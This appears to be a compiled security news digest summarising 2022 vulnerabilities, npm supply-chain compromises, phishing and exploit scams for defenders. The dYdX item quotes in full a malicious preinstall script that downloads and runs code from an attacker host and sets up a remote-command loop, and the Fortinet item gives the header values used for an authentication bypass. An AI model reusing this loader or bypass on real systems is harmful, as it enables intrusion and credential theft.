1. New Timing Attack Against NPM Registry API Could Expose Private Packages

A novel timing attack discovered against the npm’s registry API can be exploited to potentially disclose private packages used by organizations, putting developers at risk of supply chain threats. By creating a list of possible package names, threat actors can detect organizations’ scoped private packages and then masquerade public packages, tricking employees and users into downloading them. The Scoped Confusion attack banks on analyzing the time it takes for the npm API (registry.npmjs[.]org) to return an HTTP 404 error message when querying for a private package, and measuring it against the response time for a non-existing module.

It takes on average less time to get a reply for a private package that does not exist compared to a private package that does. The idea, ultimately, is to identify packages internally used by companies, which could then be used by threat actors to create public versions of the same packages in an attempt to poison the software supply chain.

Recommendation 

As preventive measures, it’s recommended that organizations routinely scan npm and other package management platforms for lookalike or spoofed packages that masquerade as the internal counterparts.

2. PoC Exploit Released for Critical Fortinet Auth Bypass Bug Under Active Attacks

A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches. The issue, tracked as CVE-2022-40684 (CVSS score: 9.6), concerns an authentication bypass vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests. A successful exploitation of the shortcoming is tantamount to granting complete access “to do just about anything” on the affected system, including altering network configurations, adding malicious users, and intercepting network traffic.
That said, the cybersecurity firm said that there are two essential prerequisites when making such a request: 

• Using the Forwarded header, an attacker is able to set the client_ip to “127.0.0.1”
• The “trusted access” authentication check verifies that the client_ip is “127.0.0.1” and the User-Agent is “Report Runner” both of which are under attacker control.

3. Zimbra Releases Patch for Actively Exploited Vulnerability in its Collaboration Suite

Zimbra has released patches to contain an actively exploited security flaw in its enterprise collaboration suite that could be leveraged to upload arbitrary files to vulnerable instances.
Tracked as CVE-2022-41352 (CVSS score: 9.8), the issue affects a component of the Zimbra suite called Amavis, an open source content filter, and more specifically, the cpio utility it uses to scan and extract archives. The flaw, in turn, is said to be rooted in another underlying vulnerability (CVE-2015-1197) that was first disclosed in early 2015, which according to Flashpoint was rectified, only to be subsequently reverted in later Linux distributions.
An attacker can use cpio package to gain incorrect access to any other user accounts. 
Fixes are available in the following versions: 

• Zimbra 9.0.0 Patch 27
• Zimbra 8.8.15 Patch 34
  All an adversary seeking needs to do to weaponize the shortcoming is to send an email with a specially crafted TAR archive attachment that, upon being received, gets submitted to Amavis, which uses the cpio module to trigger the exploit.

4. Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text

Researchers are closely tracking a critical, newly disclosed vulnerability in Apache Commons Text that gives unauthenticated attackers a way to execute code remotely on servers running applications with the affected component. The flaw (CVE-2022-42889) has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and exists in versions 1.5 through 1.9 of Apache Commons Text. Proof-of-concept code for the vulnerability is already available, though so far there has been no sign of exploit activity. The Apache Software Foundation (ASF) released an updated version of the software (Apache Commons Text 1.10.0) on September 24 but issued an advisory on the flaw only last Thursday. In it, the Foundation described the flaw as stemming from insecure defaults when Apache Commons Text performs variable interpolation, which basically is the process of looking up and evaluating string values in code that contain placeholders. NIST, meanwhile, urged users to upgrade to Apache Commons Text 1.10.0, which it said, “disables the problematic interpolators by default.”

5. Feature-Rich ‘Alchimist’ Cyberattack Framework Targets Windows, Mac, Linux Environments

Researchers have uncovered a potentially dangerous cyberattack framework targeting Windows, Linux, and Mac systems that they assess is likely already being used in the wild. The framework consists of a new, stand-alone, command-and-control (C2) tool dubbed “Alchimist,” a previously unseen remote access Trojan (RAT) called “Insekt,” and several bespoke tools like a custom backdoor and malware for exploiting vulnerabilities in macOS. It also includes reverse proxies and several dual-use tools such as netcat, psexec, and an intranet-scanning tool called fscan.Alchimist is a new C2 framework that can be rapidly deployed and operated with relatively low technical expertise by a threat actor. It can generate a configured payload, establish remote sessions, deploy payloads to the remote machines, capture screenshots, perform remote shellcode execution and run arbitrary commands. Giving it those capabilities are a variety of malware tools, including a Mach-0 backdoor for macOS and a separate macOS malware dropper that exploits a known vulnerability in a root program associated with major Linux distributions (CVE-2021-4034).

6. Critical RCE Vulnerability Discovered in Popular Cobalt Strike Hacking Software

HelpSystems, the company behind the Cobalt Strike software platform, has released an out-of-band security update to address a remote code execution vulnerability that could allow an attacker to take control of targeted systems. 
The post-exploitation tool consists of a team server, which functions as a command-and-control (C2) component, and a beacon, the default malware used to create a connection to the team server and drop next-stage payloads. The issue, tracked as CVE-2022-42948, affects Cobalt Strike version 4.7.1, and stems from an incomplete patch released on September 20, 2022, to rectify a cross-site scripting (XSS) vulnerability (CVE-2022-39197) that could lead to remote code execution. The XSS vulnerability could be triggered by manipulating some client-side UI input fields, by simulating a Cobalt Strike implant check-in or by hooking a Cobalt Strike implant running on a host. This means that a malicious actor could exploit this behavior by means of an HTML «object» tag, utilizing it to load a custom payload hosted on a remote server and inject it within the note field as well as the graphical file explorer menu in the Cobalt strike UI. However, it was found that remote code execution could be triggered in specific cases using the Java Swing framework, the graphical user interface toolkit that’s used to design Cobalt Strike.

7. Researchers Detail Windows Zero-Day Vulnerability Patched Last Month

Details have emerged about a now-patched security flaw in Windows Common Log File System (CLFS) that could be exploited by an attacker to gain elevated permissions on compromised machines. Tracked as CVE-2022-37969 (CVSS score: 7.8), the issue was addressed by Microsoft as part of its Patch Tuesday updates for September 2022, while also noting that it was being actively exploited in the wild. Now, the Zscaler ThreatLabz researcher team has disclosed that it captured an in-the-wild exploit for the then zero-day on September 2, 2022. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys.  If the field cbSymbolZone is set to an invalid offset, an out-of-bounds write will occur at the invalid offset. According to Zscaler, the vulnerability is rooted in a metadata block called base record that’s present in a base log file, which is generated when a log file is created using the CreateLogFile() function.

1. dYdX Crypto Exchange NPM User Account Hijacked, Credential Stealing Malware Spread on Their Behalf

Researchers reported suspicious versions of NPM packages that belong to the dYdX Crypto Exchange. The poisoned packages were stealing credentials from victims’ machines and establishing a foothold for future arbitrary code execution. The packages were swiftly removed from the NPM registry. It seems this attack is a result of an account takeover of the NPM user of dYdX employee through which the attacker was able to upload new versions of existing credible packages.

Incident details

On September 23rd, the new 1.2.2 version of the NPM packages “@dydxprotocol/perpetual” was uploaded by a known user account of dYdX employee this version included a new preinstall script:

This command downloads and runs the following Bash script:

curl http://api.circle-cdn.com/setup.py --output setuppm.py >> /dev/null 2>&1 && python3 setuppm.py 
&&
rm setuppm.py
&&
if pgrep -f 'api.circle-cdn.com' > /dev/null;
    then pkill -f 'api.circle-cdn.com';
fi
&&
(set +m; bash -c 'while sleep 10;
do outtime=$(curl -s http://api.circle-cdn.com/time.js);
sleep $outtime; curl -s http://api.circle-cdn.com/install.js | bash;
done' &) >> /dev/null 2>&1

Let’s quickly walk through these commands.

• First, download a python script from a different URL under the same domain, save it to disk and run it.
• Then, cleanup — remove the python script from the disk and kill the download process if it is still alive
• The last four lines establish a channel for the attacker to run arbitrary commands on the infected machine. 

This channel is controlled by the files:

• Time.js — determine the time the victim’s system will sleep before checking with the C2 server for a new command
• Install.js — determine the actions that will be run on the victim’s machine
  Since the attacker can change the content of these two files hosted on their C2 server, they can run any code they’d like.

2. Researchers Report Supply Chain Vulnerability in Packagist PHP Repository

Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks. This vulnerability allows gaining control of Packagist.  Packagist is used by the PHP package manager Composer to determine and download software dependencies that are included by developers in their projects. Tracked as CVE-2022-24828 (CVSS score: 8.8), the issue has been described as a case of command injection and is linked to another similar Composer bug (CVE-2021-29472). An attacker controlling a Git or Mercurial repository explicitly listed by URL in a project’s composer.json can use specially crafted branch names to execute commands on the machine running composer update.  A successful exploitation of the flaw meant that requests to update a package could have been hijacked to distribute malicious dependencies by executing arbitrary commands on the backend server running the official instance of Packagist.

3. CISA Warns of Hackers Exploiting Critical Atlassian Bitbucket Server Vulnerability

 
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed critical flaw impacting Atlassian’s Bitbucket Server and Data Center to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2022-36804, the issue relates to a command injection vulnerability that could allow malicious actors to gain arbitrary code execution on susceptible installations by sending a specially crafted HTTP request. Successful exploitation, however, banks on the prerequisite that the attacker already has access to a public repository or possesses read permissions to a private Bitbucket repository. All versions of Bitbucket Server and Datacenter released after 6.10.17 including 7.0.0 and newer are affected, this means that all instances that are running any versions between 7.0.0 and 8.3.0 inclusive are affected by this vulnerability. CISA did not provide further details about how the flaw is being exploited and how widespread exploitation efforts are.

4. New Unpatched Zero-Day Microsoft Exchange Vulnerability Under ‘Active Exploitation’

New zero-day vulnerabilities in fully patched Microsoft Exchange servers are under active exploitation. They were discovered in August and allow for remote code execution on affected systems. Researchers suspect that Chinese hackers are responsible for the exploit. Known as CVE-2022-41040 and CVE-2022-41082, the pair of vulnerabilities are being actively exploited in real-world attacks that researchers say could give the hacker foothold in the victim’s system by dropping web shells and using them to carry out movements across a compromised network.
In a blog post on the exploits, Microsoft says it is actively investigating and says it is only aware of “limited targeted attacks” using them to get into users’ systems and that verified user credentials are required by the hacker to use the exploits. It was first spotted by a team from GTSC during a routine security monitoring and incident response exercise for a client last month. They noticed a number of obfuscated webshells in Exchange servers that were similar to a ProxyShell exploit that had been patched a year earlier. 

5. Matrix: Install Security Update to Fix End-To-End Encryption Flaws

Matrix decentralized communication platform has published a security warning about two critical-severity vulnerabilities that affect the end-to-end encryption in the software development kit (SDK).
A threat actor exploiting these flaws could break the confidentiality of Matrix communications and run man-in-the-middle attacks that expose message contents in a readable form.
Clients affected by the bugs are those using the matrix-js-sdk, matrix-ios-sdk, and matrix-android-sdk2, like Element, Beeper, Cinny, SchildiChat, Circuli, and Synod.im.
Matrix underlines that the issues have been fixed and all that users need to do to keep their communications safe is apply the available updates to their IM clients.

The critical-severity flaws discovered by the team are the following:

• CVE-2022-39250: Key/Device identifier confusion in SAS verification on matrix-js-sdk, enabling a malicious server administrator to break emoji-based verification when cross-signing is used, authenticating themselves instead of the target user;
• CVE-2022-39251: Protocol-confusion bug in matrix-js-sdk, leading to incorrectly accepting messages from a spoofed sender, opening up the possibility of impersonating a trusted sender. The same flaw makes it possible for malicious homeserver admins to add backup keys to the target’s account;
• CVE-2022-39255: Same as CVE-2022-39251 but impacting matrix-ios-sdk (iOS clients);
• CVE-2022-39248: Same as CVE-2022-39251 but impacting matrix-android-sdk2 (Android clients).

6. Bug Exploitation Now Top Ransomware Access Vector

Vulnerability exploitation accounted for 52% of ransomware incidents investigated by Secureworks over the past 12 months, making it the number one initial access vector for threat actors. Threat actors continue to rapidly weaponize new vulnerabilities, while developers of offensive security tools (OSTs) are also incentivized – by the need to generate profit or keep their tools relevant – to promptly implement new exploit code,” it argued.

“Debates about responsible disclosure often miss the fact that even where a patch exists, the process of patching a vulnerability in an enterprise environment is far more complex and slower than the process for threat actors or OST developers of weaponizing publicly available exploit code.” However, security teams must also guard against the persistent threat of credential-based attacks. Secureworks noted a 150% year-on-year increase in the use of info-stealers designed to grab credentials and gain a foothold on networks.

7. Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub

Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities. Vietnamese cybersecurity firm GTSC disclosed that some of their customers had been attacked using two new zero-day vulnerabilities in Microsoft Exchange.  Security researchers are keeping the technical details of the vulnerabilities private, and it appears only a small number of threat actors are exploiting them. Due to this, other researchers and threat actors are awaiting the first public disclosure of the vulnerabilities to use in their own activities, whether defending a network or hacking into one.

Scammers selling fake exploits

To take advantage of this lull before the storm, a scammer has begun creating GitHub repositories where they attempt to sell fake proof-of-concept exploits for the Exchange CVE-2022-41040 and CVE-2022-41082 vulnerabilities.
A scam account found by Paulo Pacheco impersonated Kevin Beaumont who has been documenting the new Exchange vulnerabilities and available mitigations.

Fake Kevin Beaumont account on GitHub

The repositories themselves don’t contain anything of importance, but the README.md describes what is currently known about the new vulnerabilities, followed by a pitch on how they are selling one copy of a PoC exploit for the zero days. This means it can go unnoticed by the user and potentially by the security team as well. Such a powerfull tool should not be fully public, there is strictly only 1 copy available so a REAL researcher can use it: https://satoshidisk.com/pay/xxx,” reads the text in the scam repository. The README files contain a link for a SatoshiDisk page where the scammer is attempting to sell the fake exploit for 0.01825265 Bitcoin, worth approximately $420.00. It should go without saying that this is just a scam, and sending any bitcoin will likely not result in you receiving anything. 

1. Researchers Disclose Critical Vulnerability in Oracle Cloud Infrastructure

Researchers have disclosed a new severe Oracle Cloud Infrastructure (OCI) vulnerability that could be exploited by users to access the virtual disks of other Oracle customers. At its core, the vulnerability is rooted in the fact that a disk could be attached to a compute instance in another account via the Oracle Cloud Identifier (OCID) without any explicit authorization. This meant that an attacker in possession of the OCID could have taken advantage of AttachMe to access any storage volume, resulting in data exposure, exfiltration, or worse, alter boot volumes to gain code execution. Besides knowing the OCID of the target volume, another prerequisite to pull off the attack is that the adversary’s instance must be in the same Availability Domain (AD) as the target.

Insufficient validation of user permissions is a common bug class among cloud service providers. The best way to identify such issues is by performing rigorous code reviews and comprehensive tests for each sensitive API in the development stage.

2. Hackers Stealing GitHub Accounts Using Fake CircleCI Notifications

GitHub is warning of an ongoing phishing campaign that started on September 16 and is targeting its users with emails that impersonate the CircleCI continuous integration and delivery platform.
The bogus messages inform recipients that the user terms and privacy policy have changed and they need to sign into their GitHub account to accept the modifications and keep using the services.

Phishing message sent to many GitHub users (CircleCI)

The threat actors’ goal is to steal GitHub account credentials and two-factor authentication (2FA) codes by relaying them through reverse proxies. Accounts protected with hardware security keys for multi-factor authentication (MFA) are not vulnerable to this attack. After obtaining valid account credentials, the threat actors create personal access tokens (PATs), authorize OAuth apps, and sometimes add SSH keys to the account to persist even after a password reset. If you haven’t received a notice from GitHub but have valid grounds to believe you may be a victim of the phishing campaign, the recommendation is to reset your account password and 2FA recovery codes, review your PATs, and, if possible, start using a hardware MFA key.

3. Lessons From the GitHub Cybersecurity Breach

When GitHub revealed details about a security breach that allowed an unknown attacker to download data from dozens of private code repositories, it was a nightmare scenario. Attackers were using information collected from GitHub to target two third-party cloud platforms-as-a-service (PaaS): Heroku and Travis CI. Attackers had stolen OAuth tokens issued to Heroku and Travis CI and used them to access and download the contents of private repositories.

These three simple steps can help improve cybersecurity posture on Salesforce. 

1. Use Salesforce-Native Applications. Applications built on Salesforce ensure that your data remains in one place with the same cybersecurity posture as the Salesforce platform. With apps consolidated on a single platform, the attack surface is greatly reduced.
2. Establish a Zero-Trust Model. Never trust, always verify. All users should have the minimum level of permissions and access needed to be able to complete their necessary tasks while requiring users to prove their need and identities before access. Audit everything.
3. Utilize Secrets Management. Never store credentials in clear text, and always assume private repositories are public. Having a secrets management solution ensures that your secrets are rotated along with having an appropriate level of security compliance around your credentials.

With this improved cybersecurity posture, developers, infosec teams, and the CEO will be at ease knowing that the organization’s most sensitive data is secure.

4. Critical Magento Vulnerability Targeted in New Surge of Attacks

Researchers have observed a surge in hacking attempts targeting CVE-2022-24086, a critical Magento 2 vulnerability allowing unauthenticated attackers to execute code on unpatched sites. Magento is an open-source e-commerce platform owned by Adobe, used by approximately 170,000 online shopping websites worldwide. The CVE-2022-24086 vulnerability was discovered and patched in February 2022, when threat actors were already exploiting it in the wild. At the time, CISA published an alert urging site admins to apply the available security update.

A couple of days later, security researchers published a proof-of-concept (PoC) exploit for CVE-2022-24086, opening the road to mass exploitation.

According to a report published by Sansec today, we have reached that stage, with the critical template vulnerability becoming a favorite in the hacker underground. Sansec’s analysts have observed three attack variants exploiting CVE-2022-24086 to inject a remote access trojan (RAT) on vulnerable endpoints.

5. CISA Warns of Critical ManageEngine RCE Bug Used in Attack

The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical severity Java deserialization vulnerability affecting multiple Zoho ManageEngine products to its catalog of bugs exploited in the wild. This security flaw (CVE-2022-35405) can be exploited in low-complexity attacks, without requiring user interaction, to gain remote code execution on servers running unpatched Zoho ManageEngine PAM360 and Password Manager Pro (without authentication) or Access Manager Plus (with authentication) software.

After being added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, all Federal Civilian Executive Branch Agencies (FCEB) agencies now must patch their systems against this bug exploited in the wild according to a binding operational directive (BOD 22-01) issued in November. The federal agencies have three weeks, until October 13th, to ensure that their networks are protected from exploitation attempts.

6. Npm Packages Used by Crypto Exchanges Compromised

Multiple npm packages published by the crypto exchange, dYdX, and used by at least 44 cryptocurrency projects appear to have been compromised. The packages in question, shown below, appear to have been published from the npm account of a dYdX crypto platform employee, BleepingComputer observed, although the exact cause of this compromise is yet to be determined:
1.  @dydxprotocol/solo – versions 0.41.1, 0.41.2
2.  @dydxprotocol/perpetual – versions 1.2.2, 1.2.3
An earlier advisory claimed that the package ‘@dydxprotocol/node-service-base-dev’ was also affected but it has since been withdrawn.
BleepingComputer observed the compromised version 0.41.1 of ‘solo’ package was still live on npm at the time of writing. These packages make up the “Ethereum Smart Contracts and TypeScript library used for the dYdX Solo Trading Protocol.”
The solo package, for example, is used by at least 44 GitHub repositories belonging to multiple crypto platforms. GitHub READMEs for both ‘solo’ and ‘perpetual’ state these are being “currently used by trade.dydx.exchange.”

7. Native Function and Assembly Code Invocation

For a reverse engineer, the ability to directly call a function from the analyzed binary can be a shortcut that bypasses a lot of grief. While in some cases it is just possible to understand the function logic and reimplement it in a higher-level language, this is not always feasible.

In the article, you will learn about 3 different ways to make this “shortcut” happen, and invoke functions directly from assembly. 
The article first covers the IDA Appcall feature which is natively supported by IDA Pro, and can be used directly using IDAPython. 
Then it demonstrates how to achieve the same feat using Dumpulator; 
and finally, you will learn how to get that result using emulation with Unicorn Engine. The practical example used in this article is based on the “tweaked” SHA1 hashing algorithm implemented by a sample of the MiniDuke malware.

8. Hackers Exploited Zero-Day RCE Vulnerability in Sophos Firewall — Patch Released

Security software company Sophos has released a patch update for its firewall product after it was discovered that attackers were exploiting a new critical zero-day vulnerability to attack its customers’ network.

The issue, tracked as CVE-2022-3236 (CVSS score: 9.8), impacts Sophos Firewall v19.0 MR1 (19.0.1) and older and concerns a code injection vulnerability in the User Portal and Webadmin components that could result in remote code execution.

As a workaround, Sophos is recommending that users take steps to ensure that the User Portal and Webadmin are not exposed to WAN. Alternatively, users can update to the latest supported version: v19.5 GA; v19.0 MR2 (19.0.2); v19.0 GA, MR1, and MR1-1; v18.5 MR5 (18.5.5); v18.5 GA, MR1, MR1-1, MR2, MR3, and MR4.